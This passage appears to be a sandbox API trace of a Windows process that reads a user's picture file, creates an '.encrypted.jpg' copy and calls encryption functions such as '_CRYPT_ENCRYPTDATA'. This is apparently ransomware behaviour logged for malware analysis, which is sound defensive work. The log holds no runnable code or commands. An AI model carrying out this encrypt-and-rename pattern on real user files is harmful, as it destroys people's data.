PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\hcaqljkeyc.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.726] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.726] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.726] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0040.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.728] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci")) returned 0x10 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\hcaqljkeyc.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.729] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.729] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.729] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.729] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.730] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.730] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xc43c, lpOverlapped=0x0) returned 1 [0040.732] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc43c) returned 0xac2018 [0040.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc43c) returned 0xace460 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc43c) returned 0xac2018 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.735] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.735] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc43c) returned 0xac2018 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0040.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0040.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc43c) returned 0x935008 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.737] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.738] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.738] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3a8 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.738] 